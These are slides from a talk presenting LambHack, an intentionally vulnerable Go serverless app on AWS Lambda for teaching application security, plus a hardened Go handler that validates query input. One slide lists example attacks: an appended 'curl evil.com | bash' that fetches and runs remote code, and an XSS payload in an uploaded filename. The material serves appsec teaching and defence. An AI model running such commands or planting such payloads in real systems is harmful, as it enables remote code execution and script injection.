LambHack is a vulnerable serverless application written in Go, running in AWS Lambda on the Go Sparta serverless framework. This talk focuses on how application security still matters in serverless.
Talk from 12 Clouds of Christmas at Cloud Austin.
2. CLOUD AUSTIN @WICKETT
WHY IT MATTERS
Development of highly-resilient, distributed systems is now easier than ever with serverless; however, application security is more important than ever before.
JAMES WICKETT
‣ HEAD OF RESEARCH AT SIGNAL SCIENCES
‣ DEVOPS DAYS AUSTIN ORGANIZER
‣ AUTHOR OF DEVOPS FUNDAMENTALS AT LYNDA.COM
‣ BLOGGER AT THEAGILEADMIN.COM AND LABS.SIGNALSCIENCES.COM
SERVERLESS DEFINITION
Serverless encourages functions as deploy units, run as one-time*, read-only containers*, coupled with third-party services that allow running end-to-end applications without worrying about system operation.
* there is container reuse and writability
INTRODUCING LAMBHACK
‣ SERVERLESS HAS A FALSE SENSE OF SECURITY
‣ API PROXY LAYER THING PROTECTS ME, RIGHT? ;)
‣ WANTED TO MAKE THE POINT THAT APPSEC IS RELEVANT IN SERVERLESS
‣ A VULNERABLE LAMBDA + API GATEWAY STACK
‣ BORN FROM THE HERITAGE OF WEBGOAT, RAILSGOAT, GRUYERE, AND OTHERS…
‣ A VULNERABLE LAMBDA + API GATEWAY STACK
‣ OPEN SOURCE, MIT LICENSED
‣ INCLUDES ARBITRARY CODE EXECUTION IN A QUERY STRING
‣ MORE WORK NEEDED, PULL REQUESTS ACCEPTED AND LOOKING FOR COMMUNITY HELP
‣ GITHUB.COM/WICKETT/LAMBHACK
github.com/wickett/lambhack
GO SPARTA
‣ GOLANG!
‣ AWS LAMBDA SUPPORTS BRING YOUR OWN BINARY
‣ SPARTA WRAPS YOUR COMPILED BINARY WITH A NODE.JS SHIM
‣ GO SPARTA ALSO HANDLES ALL THE OTHER AWS SERVICES YOUR APP CONSUMES
GO SPARTA INCLUDES
‣ CLOUDWATCH EVENTS AND LOGS
‣ DYNAMODB, KINESIS
‣ S3
‣ SES, SNS
‣ API GATEWAY CREATION
lambhack is a vulnerable serverless lambda application. It would certainly be a bad idea to base any coding patterns off what you see here.
TYPES OF ATTACKS
‣ New surface area, similar appsec problems
‣ Command Exec, XSS, Injection Attacks
‣ All the OWASP Top Ten
‣ What is old is new.
‣ Appending ‘curl evil.com | bash’
‣ Add <script>alert(1)</script> to a filename you upload on S3
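The "arbitrary code execution in a query string" that lambhack ships with, and the appended ‘curl evil.com | bash’ above, come from request input reaching a shell. The hardened Go handler core below is an added example, not lambhack's or Sparta's code: the parameter name `host`, the hostname allowlist and the ping command are assumptions, and the point is that the parameter is validated against an allowlist and then placed into argv directly, so no shell ever interprets it.

```go
package main

import (
	"context"
	"errors"
	"net/url"
	"os/exec"
	"regexp"
)

// Constructed sample request: a query string whose "host" parameter
// (an assumed name) is meant to hold a single hostname.
const sampleQuery = "host=example.com"

// In the vulnerable pattern the slides describe, the raw parameter lands on
// a shell command line, so a ';' or '|' followed by "curl evil.com | bash"
// gets executed. The code below never passes request input to a shell.

// ErrBadHost is returned for any parameter outside the allowlist.
var ErrBadHost = errors.New("host parameter failed allowlist")

// hostParam allowlists a DNS-style hostname: labels of letters, digits and
// hyphens joined by dots, never starting with "-" (so no flag injection).
var hostParam = regexp.MustCompile(`^[A-Za-z0-9][A-Za-z0-9-]{0,62}(?:\.[A-Za-z0-9][A-Za-z0-9-]{0,62})*$`)

// validateHost parses the query string and returns the host only if it
// passes the allowlist; anything else is rejected before any exec.
func validateHost(rawQuery string) (string, error) {
	q, err := url.ParseQuery(rawQuery)
	if err != nil {
		return "", err
	}
	h := q.Get("host")
	if len(h) > 253 || !hostParam.MatchString(h) {
		return "", ErrBadHost
	}
	return h, nil
}

// pingCommand is the hardened handler core: validate, then build argv
// directly (fixed binary, fixed flags, host as one argument) so shell
// metacharacters are never interpreted. Callers run it with .Output().
func pingCommand(ctx context.Context, rawQuery string) (*exec.Cmd, error) {
	host, err := validateHost(rawQuery)
	if err != nil {
		return nil, err
	}
	return exec.CommandContext(ctx, "/bin/ping", "-c", "1", host), nil
}
```

Run it with a context.WithTimeout so a slow or hung child process cannot pin the Lambda invocation until its own timeout.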
WHY IT MATTERS
Development of highly-resilient, distributed systems is now easier than ever with serverless; however, application security is more important than ever before.
WANT THE SLIDES RIGHT NOW OR HAVE QUESTIONS?
Send an email to james@signalsciences.com